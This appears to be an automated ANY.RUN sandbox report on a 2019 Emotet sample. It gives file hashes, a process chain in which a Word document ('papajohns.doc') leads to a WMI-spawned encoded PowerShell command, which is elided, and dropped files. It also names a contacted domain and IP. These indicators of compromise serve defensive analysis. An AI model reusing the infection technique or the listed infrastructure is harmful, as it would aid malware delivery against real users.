File name: sample.zip
Full analysis: https://app.any.run/tasks/fd729e81-22e5-4de1-a23a-2a0f2497ebae
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 15:20:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: emotet-doc, emotet
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: E0BAAF15FF9ABA4CCACC7901461A7B7D
SHA1: 43A91D452F6BE306CFB1F0C0C0710C775780991C
SHA256: 785A7393000AEA7B7F5E252E9DC22936666853C38B2BB34C92530095D45CD16C
SSDEEP: 3072:R8BZjyqMxwEQkPSMc9eva6ziHeGVp6meADYEX1ZYIG0VM8t:R8B5BMfIoaNRVgWDTX1ZbG4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Drops known malicious document
      • WinRAR.exe (PID: 2104)
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 2064)
    • Executed via WMI
      • powershell.exe (PID: 2064)
    • PowerShell script executed
      • powershell.exe (PID: 2064)
  • INFO
    • Manual execution by user
      • WINWORD.EXE (PID: 3012)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3012)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3012)
    • Dropped object may contain Bitcoin addresses
      • WinRAR.exe (PID: 2104)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD
  • .zip | ZIP compressed archive (100)

EXIF (ZIP)
  • ZipRequiredVersion: 788
  • ZipBitFlag: 0x0001
  • ZipCompression: Deflated
  • ZipModifyDate: 2019:10:14 15:20:03
  • ZipCRC: 0x5e240e69
  • ZipCompressedSize: 166608
  • ZipUncompressedSize: 280064
  • ZipFileName: 39b828dfbbee573d93584d84c0ed2e9bfac65f44d9acab1a97bd052bd0e5b7b6.bin

No data.
All screenshots are available in the full report
Total processes: 41
Monitored processes: 3
Malicious processes: 1
Suspicious processes: 1

Behavior graph (interactive in the full report; nodes shown): start, winrar.exe (no specs), winword.exe (no specs), powershell.exe

Process information

PID 2104
  CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip"
  Path: C:\Program Files\WinRAR\WinRAR.exe
  Parent process: explorer.exe
  User: admin
  Company: Alexander Roshal
  Integrity Level: MEDIUM
  Description: WinRAR archiver
  Version: 5.60.0

PID 3012
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\papajohns.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 2064
  CMD and Path (the encoded command is elided in the source): powershell -enco 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:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: wmiprvse.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 2 571
Read events: 1 738
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 3
Text files: 2
Unknown types: 17

Dropped files

PID 3012, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Temp\CVR2159.tmp.cvr
  Type, MD5, SHA256: not given

PID 2064, powershell.exe
  Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z5XHP0OQQF4RQYA731J7.temp
  Type, MD5, SHA256: not given

PID 3012, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
  Type: text
  MD5: 1758F84A3F62413C7517AC6E872C99E9
  SHA256: D61076D52014648BC5C9A8A77119F576836A83E788C834086572581A1908F908

PID 3012, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9B04D17.wmf
  Type: wmf
  MD5: 1BFE099A90FAB05C195222CD14B04102
  SHA256: A6D1EDEF80BB10701BF1B2F2340A4A899C4CBC6FCDA894B1A75F7271FFE9D305

PID 3012, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DD168D9.wmf
  Type: wmf
  MD5: 26456A5B0F195CBF1182E6310ED4B97C
  SHA256: AFEBC2496C157D8462F7A849721C959D303DCE7A4B931927993524A0C1E3BD73

PID 3012, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B2FEE38.wmf
  Type: wmf
  MD5: 7336E71E93A1B0BFA6901D91FAA547C8
  SHA256: 4383262EF326FE758DA53407048F353265D86D1B14B70E74F19ACD45AEC5450E

PID 2104, WinRAR.exe
  Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb2104.45929\39b828dfbbee573d93584d84c0ed2e9bfac65f44d9acab1a97bd052bd0e5b7b6.bin
  Type: document
  MD5: FEC4795055DE05BA9B434BCF5F372E19
  SHA256: 39B828DFBBEE573D93584D84C0ED2E9BFAC65F44D9ACAB1A97BD052BD0E5B7B6

PID 3012, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\166AE1EE.wmf
  Type: wmf
  MD5: 34ED6F7A829314D7BDB154AD22EC92AF
  SHA256: 28DAC4CED4FE090DF96FDCCC4A579DA28D2F5C2A76DA37E14B92AC4CDBAC6CC2

PID 3012, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F388E3D.wmf
  Type: wmf
  MD5: 60EBC56D56472CA242A746C96EC337EB
  SHA256: 4FC019E24824CAC6246AEAD69E56002EF20EED33A5DF8EDD551BCE02334CE9E9

PID 3012, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3495361.wmf
  Type: wmf
  MD5: 0D1C5E4D9DE440BF2991A05E04577B97
  SHA256: 6199B78311078F8CF0AFDEA6AB23E83E50967E7ADE60C5E7B6622098837FFE48
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

HTTP(S) requests: 0
TCP/UDP connections: 1
DNS requests: 1
Threats: 0

HTTP requests: No HTTP requests

Connections

  • IP: 172.104.51.209:443
    Domain: tongdogiare.com
    ASN: Linode, LLC
    CN: SG
    Reputation: unknown
    (PID and Process not given in the source)

DNS requests

  • Domain: tongdogiare.com
    IP: 172.104.51.209
    Reputation: unknown

Threats: No threats detected

Debug info: No debug info